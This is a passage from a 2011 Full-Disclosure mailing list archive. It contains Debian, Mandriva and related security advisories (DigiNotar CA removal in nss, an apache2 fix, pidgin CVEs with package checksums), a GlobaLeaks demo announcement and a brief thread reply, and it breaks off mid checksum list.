qcnQ3RhaVc//I2RuvPDSY9zDbE4OfgNYRtAnk3j7kbVf0U4ohs9TNTJqy1uCYjZn
dA6b27JdgxgXnRFM0AvHfYOyA/V2+w4ykwfAjGJG2hcmCxxkofDkzbf/WKrGinYV
o+NEF5QEU5y84Z+4EvFYEP+zmMShIvoBU/Fui+TNzxEh3MSRumMdJoJfV2MdSO+m
C98R6hx1Q8nxmNCZpPXAWttfGomhtTXAwYIlywR0pqxyrBpsaEleNLbDPaNnr2/D
Jph+q3Mv5nRteRfMRyX0bmqguSYsa0TIFZlL5vvIRGBw+b7Q4wIL0ywRvWqxLGU=
=r9kt
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2300-2] nss security update

[Thijs Kinkhorst]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2300-2   secur...@debian.org
http://www.debian.org/security/   Thijs Kinkhorst
September 5, 2011  http://www.debian.org/security/faq
- -

Package: nss
Vulnerability  : comprimised certificate authority
Problem type   : local(remote)
Debian-specific: no
CVE ID : not available

Several unauthorised SSL certificates have been found in the wild issued
for the DigiNotar Certificate Authority, obtained through a security
compromise with said company. Debian, like other software
distributors, has as a precaution decided to disable the DigiNotar
Root CA by default in the NSS crypto libraries.

As a result from further understanding of the incident, this update
to DSA 2300 disables additional DigiNotar issuing certificates.

For the oldstable distribution (lenny), this problem has been fixed in
version 3.12.3.1-0lenny6.

For the stable distribution (squeeze), this problem has been fixed in
version 3.12.8-1+squeeze3.

For the unstable distribution (sid), this problem has been fixed in
version 3.12.11-2.

We recommend that you upgrade your nss packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJOZS2IAAoJEOxfUAG2iX57ZUkIAKyhYPcOl5O9GLakYFxoQrWE
UtP3q6Y0Of1Qw+7e+WLNnuuWL0atn8gMxebJvVIdSvwnyR2maWFfjU4nAIZW9g6r
ETXuRXXOyGfZbQf8uxJZmVDwKout5kafCtbQB75hsUcSCA9T4okpaM7SQLjFULB0
45Q9tjKU/e6QE6kezKKkpj9Mm3wE3zAfL6wnD5HwBYfUN6U6K2a2T0AIBFheMtIo
jzHB3/WajYQbUG1CCQwfbrPSQcvER9PsirK02n3IBywdzDdWUGAzqyyM8mBIjC4X
lS/PqWifwaO62kz1OK3y6EAtgdR+NQNNKszuWgKoS6jhUMaH67NrFsoYmyXhkqo=
=OP2H
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2298-2] apache2 regression fix

[Stefan Fritsch]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2298-2   secur...@debian.org
http://www.debian.org/security/Stefan Fritsch
September 05, 2011 http://www.debian.org/security/faq
- -

Package: apache2
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2010-1452 CVE-2011-3192
Debian Bug : 639825

The apache2 Upgrade from DSA-2298-1 has caused a regression that
prevented some video players from seeking in video files served by
Apache HTTPD. This update fixes this bug.


The text of the original advisory is reproduced for reference:

Two issues have been found in the Apache HTTPD web server:

CVE-2011-3192

A vulnerability has been found in the way the multiple overlapping
ranges are handled by the Apache HTTPD server. This vulnerability
allows an attacker to cause Apache HTTPD to use an excessive amount of
memory, causing a denial of service.

CVE-2010-1452

A vulnerability has been found in mod_dav that allows an attacker to
cause a daemon crash, causing a denial of service. This issue only
affects the Debian 5.0 oldstable/lenny distribution.


The regression has been fixed in the following packages:

For the oldstable distribution (lenny), this problem has been fixed
in version 2.2.9-10+lenny11.

For the stable distribution (squeeze), this problem has been fixed in
version 2.2.16-6+squeeze3.

For the testing distribution (wheezy), this problem will be fixed in
version 2.2.20-1.

For the unstable distribution (sid), this problem has been fixed in
version 2.2.20-1.

We recommend that you upgrade your apache2 packages.

This update also contains updated apache2-mpm-itk packages which have
been recompiled against the updated apache2 packages. The new version
number for the oldstable distribution is 2.2.6-02-1+lenny6. In the
stable distribution, apache2-mpm-itk has the same version number as
apache2.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFOZRyJbxelr8HyTqQRAgWFAKDP1kDXzpKPGlXpBbcdipn2FbmuxwCfURQA
NNtaH5umxE10PXJWx5DGllE=
=dsxD
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Globaleaks demo of the Prototype online! $ /etc/init.d/globaleaks start

[Arturo Filastò]

Hi All,

We are pleased to announce the release of the GlobaLeaks Prototype Demo.

You are all invited to take a look at it and try how it feels to a Node
Administrator, Whistleblower and TULIP receiving target.

You can reach the demo on http://demo.globaleaks.org/

GlobaLeaks is the first Open Source Whistleblowing Framework.

It empowers anyone to easily setup and maintain their own Whistleblowing
platform. It is also a collection of what are the best practices for
people receiveiving and submitting material. GlobaLeaks works in all
environments: media, activism, corporations, public agencies.

For the full release notice you can visit http://www.globaleaks.org/news/

For all the links and information on the project http://www.globaleaks.org.

GlobaLeaks has been tested by more than 50 drunk Venetian hackers, here
is a link the presentation given at the Italian Hacker camp ESC:
http://www.slideshare.net/globaleaks/globaleaks-live-launch-venice-2011.

And most importantly, please come and hack with use and let's change the
world! http://www.launchpad.net/globaleaks/

Happy hacking,

A Random GlobaLeaks Contributor

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking

[Georgi Guninski]

On Mon, Sep 05, 2011 at 07:50:51PM +, Thor (Hammer of God) wrote:
> Excellent points - one slight addition, though:
> 
> >In fact, the Windows Script Host software is mostly used to write system 
> >maintenance scripts, 
> >so it's obvious its scripts can't be restricted or they'd be useless.
> 
> Scripts can certainly be restricted based on the account context they are 
> executed under.   There is actually plenty one can do with "normal user" 
> scripts, but as you've pointed out, many of the options admins require 
> scripts for need escalated privileges.   This is obviously be design, and it 
> helps to keep admins aware of best practices when choosing to deploy 
> solutions via scripting.  There are, of course, many many other ways once can 
> accomplish system maintenance in a more secure way such as WMI, PS (which can 
> require signed scripts) and of course GPO and/or any other number of 
> solutions.  
> 
> I thought it important to outline that since, in my experience with "real" 
> admins, WSH is actually *not* used mostly for system maintenance per se, but 
> for standard automation.   Using scripts to perform actual administrative 
> tasks/maintenance is just a bad idea to begin with.  
>

you mean "to perform actual administrative tasks/maintenance" 
``"real" admins'' just click with the mouse on the platform in this thread?

-- 
joro

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDVSA-2011:132 ] pidgin

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:132
 http://www.mandriva.com/security/
 ___

 Package : pidgin
 Date: September 6, 2011
 Affected: 2009.0, 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities has been identified and fixed in pidgin:
 
 It was found that the gdk-pixbuf GIF image loader routine
 gdk_pixbuf__gif_image_load() did not properly handle certain return
 values from its subroutines. A remote attacker could provide a
 specially-crafted GIF image, which, once opened in Pidgin, would lead
 gdk-pixbuf to return a partially initialized pixbuf structure. Using
 this structure, possibly containing a huge width and height, could
 lead to the application being terminated due to excessive memory use
 (CVE-2011-2485).
 
 Certain characters in the nicknames of IRC users can trigger a
 null pointer dereference in the IRC protocol plugin's handling of
 responses to WHO requests. This can cause a crash on some operating
 systems. Clients based on libpurple 2.8.0 through 2.9.0 are affected
 (CVE-2011-2943).
 
 Incorrect handling of HTTP 100 responses in the MSN protocol plugin
 can cause the application to attempt to access memory that it does
 not have access to. This only affects users who have turned on the
 HTTP connection method for their accounts (it's off by default). This
 might only be triggerable by a malicious server and not a malicious
 peer. We believe remote code execution is not possible (CVE-2011-3184).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 This update provides pidgin 2.10.0, which is not vulnerable to
 these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2485
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2943
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3184
 http://pidgin.im/news/security/
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 9691deaad1615375a6c96002da7de57b  
2009.0/i586/finch-2.10.0-0.1mdv2009.0.i586.rpm
 eed6d45dede5d4ab8bc775d088577f8a  
2009.0/i586/libfinch0-2.10.0-0.1mdv2009.0.i586.rpm
 aaeffe8dfc8088f8e75e1646c8803786  
2009.0/i586/libpurple0-2.10.0-0.1mdv2009.0.i586.rpm
 429d026faa1969f6c7f2ee2aba74e6f4  
2009.0/i586/libpurple-devel-2.10.0-0.1mdv2009.0.i586.rpm
 01da4c0f516a35076222558b8c0f42c3  
2009.0/i586/pidgin-2.10.0-0.1mdv2009.0.i586.rpm
 54418f3845f324c46862d070f7d003d5  
2009.0/i586/pidgin-bonjour-2.10.0-0.1mdv2009.0.i586.rpm
 f44a27aa04c704e4f194117636d83ed7  
2009.0/i586/pidgin-client-2.10.0-0.1mdv2009.0.i586.rpm
 1aafb8808069d2d2fb2625b10c76e7fb  
2009.0/i586/pidgin-gevolution-2.10.0-0.1mdv2009.0.i586.rpm
 52027036563b73dd5eb8eacfa3ceffd0  
2009.0/i586/pidgin-i18n-2.10.0-0.1mdv2009.0.i586.rpm
 a5992cae2ba908cd1800dff218076838  
2009.0/i586/pidgin-meanwhile-2.10.0-0.1mdv2009.0.i586.rpm
 2cd0288083dcb742e7dabdc46e7cc854  
2009.0/i586/pidgin-perl-2.10.0-0.1mdv2009.0.i586.rpm
 43ce83b4706b90d5025f4f55c83f1e0b  
2009.0/i586/pidgin-plugins-2.10.0-0.1mdv2009.0.i586.rpm
 35b1cd147e3e1836ea7f7b75ab70c531  
2009.0/i586/pidgin-silc-2.10.0-0.1mdv2009.0.i586.rpm
 ae8ba0b0dc82d9deff4ef3bb88a4076d  
2009.0/i586/pidgin-tcl-2.10.0-0.1mdv2009.0.i586.rpm 
 62f6a69270844338264edd3fbaa51e75  
2009.0/SRPMS/pidgin-2.10.0-0.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 b119fdb620e35194b3c94e5f486feff3  
2009.0/x86_64/finch-2.10.0-0.1mdv2009.0.x86_64.rpm
 748d4cd30f8c1b9a83e1759a6a522568  
2009.0/x86_64/lib64finch0-2.10.0-0.1mdv2009.0.x86_64.rpm
 f809eae51ca1dcb9d9298db5edd03b49  
2009.0/x86_64/lib64purple0-2.10.0-0.1mdv2009.0.x86_64.rpm
 4779a76e384c0f80a39a86b34c59ad1b  
2009.0/x86_64/lib64purple-devel-2.10.0-0.1mdv2009.0.x86_64.rpm
 05b1274031920567e741278b527e8c62  
2009.0/x86_64/pidgin-2.10.0-0.1mdv2009.0.x86_64.rpm
 2847f0c347adaa594df6b6ad7675e600  
2009.0/x86_64/pidgin-bonjour-2.10.0-0.1mdv2009.0.x86_64.rpm
 a3c16b86b4060d62288a20485d53b333  
2009.0/x86_64/pidgin-client-2.10.0-0.1mdv2009.0.x86_64.rpm
 6ba1fd63f59ac46016641585282af002  
2009.0/x86_64/pidgin-gevolution-2.10.0-0.1mdv2009.0.x86_64.rpm
 8dfe86bf046bae759a82701cf115d06d  
2009.0/x86_64/pidgin-i18n-2.10.0-0.1mdv2009.0.x86_64.rpm
 34c0c000fd2adce18ae980bd1de89f81  
2009.0/x86_64/pidgin-meanwhile-2.10.0-0.1mdv2009.0.x86_64.rpm
 75289966638d58d9b4aec8c5dfe64245  
2009.0/x86_64/pidgin-perl-2.10.0-0.1mdv2009.0.x86_64.rpm
 c5cecff86e10fa7b2802fef7f0d9d315  
2009.0/x86_64/pidgin-plugins-2.10.0-0.1mdv2009.0.x86_64.rpm
 1642cc9818fed7cdfb9f673d5eab4302  
2009.0/x8